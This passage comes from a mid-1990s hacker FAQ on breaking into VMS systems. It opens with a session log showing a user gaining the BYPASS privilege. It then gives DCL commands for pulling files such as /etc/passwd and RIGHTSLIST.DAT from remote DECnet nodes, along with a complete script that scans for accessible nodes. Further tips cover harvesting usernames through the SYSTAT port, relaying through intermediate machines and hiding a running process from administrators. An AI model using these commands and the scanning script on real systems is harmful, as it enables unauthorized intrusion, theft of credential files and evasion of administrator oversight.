			  Node: UPPERDCK         Process name: "JOJBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set process/priv=bypass ! Note,  no error when we do this now. 
UPDCK> show process/priv       ! To prove that we have gained BYPASS

 6-JAN-1995 07:42:53.37   User: JOEBOB           Process ID:   00000110
			  Node: UPPERDCK         Process name: "JOEBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device
 BYPASS               bypasses UIC checking 

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> logout ! I can pretty much do anything now.... Lets stop this subprocess
  Process JOEBOB_1 logged out at  6-JAN-1995 07:42:59.01
UPDCK> logout ! logout completely

  JOEBOB       logged out at  6-JAN-1995 07:43:05.11
Connection closed by foreign host.

	     -     Using DEC's Network to your advantage     -

1.      "What is a DECNet?"

"DECNet is a collective name for the family of communications products
(software and hardware) that allow DIGITAL operating systems to participate
in a network.  

"A DECNet network links computers into flexible configurations to exchange
information,  share resources,  and perform distributed processing.  DECNet
distribution processing capabitlites also information to be originated
anywhere in the network."

		- VMS Version 5.0 DECnet "Guide to DECNet - VAX Networking"

	DECNet can support a minimum of 2 nodes and up to 64,000 nodes, 
	and can support multiple OS's along with various LAN/WAN
	(Using PSI,  and DECNet system can be supported on packet 
	switching enviroments (like Tymnet and Sprintnet)) and  
	operating environments. (VMS,   Ultrix,  RSX, and with the correct
	hardware,  IBM PC's,  VAXmate's, etc).  

	DECNet allows easy access to information from system to system,
	assuming you have the NETMBX privilege.

	To get a list of DECNet objects, "$MCR NCP SHOW KNOWN OBJECTS".

2.      "This is great,  what does it mean to me."

	You can use DECNet to grab information/files/programs and use
	them to your own advantage (granted that security has not 
	been completely implemented... which is usually the case
	on a vanilla/default install)

	For instance,  if a intruder where to break into a system
	which supported a DECNet,  he/she might be able to access files on
	a remote system/nodes of that DECNet.  As stated,   DECNets
	can range from local machines in that area (LAN) or 
	DECNet's can stretch across the world.  

3.      "How would I get to that information on a remote node?"

	All from DCL,  accessing the default, unprived DECNet or possibly
	prived proxy account on the remote node, using commands like
	"DIRECTORY",  "COPY", "TYPE",  etc.   Usually by adding in the node
	name at the being of the command.  For example

$ DIR NODE::            ! Example format.

	or 

$ DIR NODE::SYS$COMMON:[SYSEXE]  ! Shows logical SYS$COMMON and the SYSEXE
				 ! Directory on the remote node. 

	or

$ COPY NODE::DISK1:[BOB]SECRET.TXT []  ! The "[]" means "wherever i am"

	Remember DECNet object logs are being kept!

4.      "What if I want to connect and use the nodes interactively?". 

	One of two ways.  Either way requires NETMBX privilege. Try to
	"SET HOST [NODENAME]".  If that fails, 
	try to use NCP (Network Control Program),  like this.....

$ MCR NCP CONNECT NODE [NODENAME]

5.      "Well, Gee,  thats wonderful.  How do I find connectable nodes
	that are on the DECNet"

	Once again, this information can be found using the NCP (
	or via a "SHOW NETWORK") command. "SHOW NETWORK" won't work  
	if you are on a non-routing node. You might not get a 
	*complete* listing,  because the host you are on might not 
	know all DECNet nodes,  but it will at least get you hoping 
	around on the DECNet.  This list can be obtain via executing.....

$ MCP NCP SHOW KNOWN NODE (SYS$SYSTEM:NETNODE_LOCAL.DAT,
			   SYS$SYSTEM:NETNODE_REMOTE.DAT)

	This will dump a list.  You can sort though the information 
	using the NCP connect command,  and see what all sorts 
	of things you run into (Xyplex/DECServers,  Other VMS Machines, 
	SNA Gateway controls,  etc, etc).  If you are only interested
	in machine that you can get file information on,  you can 
	us the following command file to find nodes that you can
	use. 

$! DECNETFIND  Version 1.0
$! Coded By The Beaver
$! Jan 5th,  1995
$!
$! The intent of this code is to scan for remote,  connectable nodes that
$! the VMS host knows about (Via NCP) and build a list.  Once this list
$! has been created,  we check to see if the remote machine is indeed
$! A> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly
$! accessed via the DECNet 3> Can we read file systems on the remote node. 
$! Node that are "successful" are stored away.  This prevents mucho 
$! time consuming scanning by hand.  
$!
$!
$ on error then goto err                        ! In case of Boo-Boo
$ say :== write sys$output
$ if p1 .eqs. ""                                ! Yes, output file helps 
$       then
$       say "DECNet VMS Node Finder Version 1.0                   1995"
$       say "Coded By The Beaver"
$       say ""
$       say "Usage:"
$       say "DECNETFIND [Outfile]"
$       exit
$       endif
$!
$ say "Building Node List Via NCP....(Working)"
$!
$ mcr ncp show known nodes to nodes.out  ! Fire up NCP and dump nodeslist
$ open/read in nodes.out                 ! Open to read
$ open/write nodelist 'p1'               ! "Success" Storage area. 
$ on severe_error then loop1             ! So things dont die on "dir ::"'s
$!
$ loop1:
$ read/end = end in line
$       name=f$element(0,")", f$element(1, "(", line)) ! grab a nodename
$       if name .gts. "(" 
$         then  
$         say "**************************************************************"
$         say "Nodename: "+name
$         say ""
$         dir 'name'::          ! See if we can get to it via a DECNet DIR::
$         if $severity .nes "1"
$               then
$               say "Status:  Node Unreachable Via DECNet Dir::"
$               else
$               say "Status:  Found Good Node. [Logged]"
$               write nodelist name             ! Log it.
$               endif
$ endif
$ goto loop1
$ err:
$ say "Ouch.  There has been a error!"
$ end:
$ close in
$ close nodelist                ! Close up and leave,  exit stage
$ delete nodes.out;*            ! right
$ say "Complete!"
$ exit

	"That works great,  but I ran into a Unix (Ultrix) machine,  and 
	when I do a 'DIR NODENAME::' it only gives me some jerk-off's 
	directory.   Is there anyway I can grab files off the remote machine 
	(Ultrix) and directory listings?"

	Once again,  no problem.   Format the command like this:

$ DIR NODE::"/etc"      ! will give remote nodes /etc directory

	Or to grab the /etc/passwd file on the remote node,  try....

$ TYPE NODE::"/etc/passwd"   ! And open a capture buffer. 

	"Can I grab a VMS rights list?"

$ COPY NODE::"SYS$SYSTEM:RIGHTSLIST.DAT" RIGHTSLIST.DAT

6.  "Can't DECNet be protected more against this generic attack?"

	Sure,  by disabling the DECNet account and by watching any
	proxy accounts that may be set up (probably not a good idea to
	have a proxy into a privileged account). Unless a proxy account is
	set up (SYS$SYSTEM:NETPROXY.DAT), users must supply a password when
	attempting to do network operations like above.  Proxy logins are
	formatted below:

	(This example is using the DCL COPY command)

	COPY remotenode"proxyaccount"::filename filename

	for example, 

	COPY ADAM"BOB"::SECURITY.TXT MYSECURITY.TXT

	(BOB - The Proxy login name)

	However,  in a vannila VMS (IE - Default installation), 
	proxy logins are not enabled. 

7.      "Are proxy logins logged.. Can I write a routine that will
	attempt proxy accounts to break into remote machines?"

	You bet that proxy logins are logged.   Repeating invalid 
	attempts will inform the administrations that a "NETWORK
	BREAK IN" is in effect (via the OPCOM process). 

8.      Sneak Routing

	You can access a machine you normally couldn't by piggybacking
	over a machine(that can get to the machine you can't) you can get to
	through the DECNet account. This is called "Poor Man's Routing". It
	is preventable by the sys admin on the piggyback machine.

		-       TCP/IP Networked Machines        - 

1.  "I have found a remote VMS machine on a TCP/IP network (I.E. 
     the internet).   I have tried to finger the remote system in
     order to start collecting usernames,   I get a 'connection
     refused'.... Now what?"

	Connect to the SYSTAT port (Port 11).  This will give jobs
	currently running on the system.  More than likely,  this
	port has been left open.  With this in mind,  you can 
	sort though all the jobs and grab usernames,  while excluding
	system jobs (I.E - SWAPPER,  ERRFMT,  AUDIT_SERVER, 
	JOB_CONTROL,  NETACP,  EVL,  REMACP,  SYMBIONT*,  
	XYP_SERVER,   OPCOM,  INET_SERVERS, etc....etc).  

	Also,  I find one great trick is to look for "Student" type
	accounts.  That is,  accounts that appear to be repetitive. 
	You can then predict possible usernames. 

	The above can be accomplisted by using the below command
	(In most cases):

$ TELNET SITE.ADDRESS.COM /PORT=11

	Try other ports as well.  Netstat is port 15.

2.      "On Unix machines,  I can make a symbolic link to a 'questionable'
	command,   so that is appears that I am doing one thing when 
	I am really doing another (Or copying and renaming the command). 
	Is there anyway I can make it appear that I am doing something 
	that I am not?". 

	When the command "FINGER" is issued,  a user/administrator
	can see what image is currently being executed by a particular
	user.   For example sake,  lets say you want to play with 
	NCP but you know that if the administrators see you in NCP, 
	they will get rather irate,  and kick you off the system. 
	You can make it appear that you are doing something else 
	by:

	a>  Copying the image,  renaming it,  and running it. [which
	    may or may not work]. 

3.      TCPDUMP

	Multinet(and probably other TCP/IP implementations on VMS) provides
	the sniffer program TCPDUMP, but of course you must be privileged
	to use it.

Final Notes: 

	This FAQ is far from complete,  and will remain in its "beta"
	stages for sometime.  

	I got alot of mail from alot of people. 

	Thanks to Shadow Hacker,   Risc,   Trouser,  Spoon,  and 
	all the boys at The Upper-Deck. 

	Bitwarrier for interesting conversation (besides terminal
	spoofing),  the ton of people that mailed me.  Thanks.

	- Things that need to be added/updates:

	  Identifying VMS machines.....
	  Information on the OPCOM process....

	- What we are looking for:

	  Ways of intercepting VMS communications(through mailboxes, etc.)

	  Passing commands via VMS mail.

	  Disk scavenging programs(along the lines of an "UNDELETE")

	  Xterm,Motif security

	  Various methods of machine spoofing(via TCP/IP,LAT,etc.)

	  File hacks with 'dump', 'patch', VFE, etc.

	  Anything else we might have missed.

	beaver@upperdck.blkbox.com

	"It ain't done,  but hey... It a fucking start......"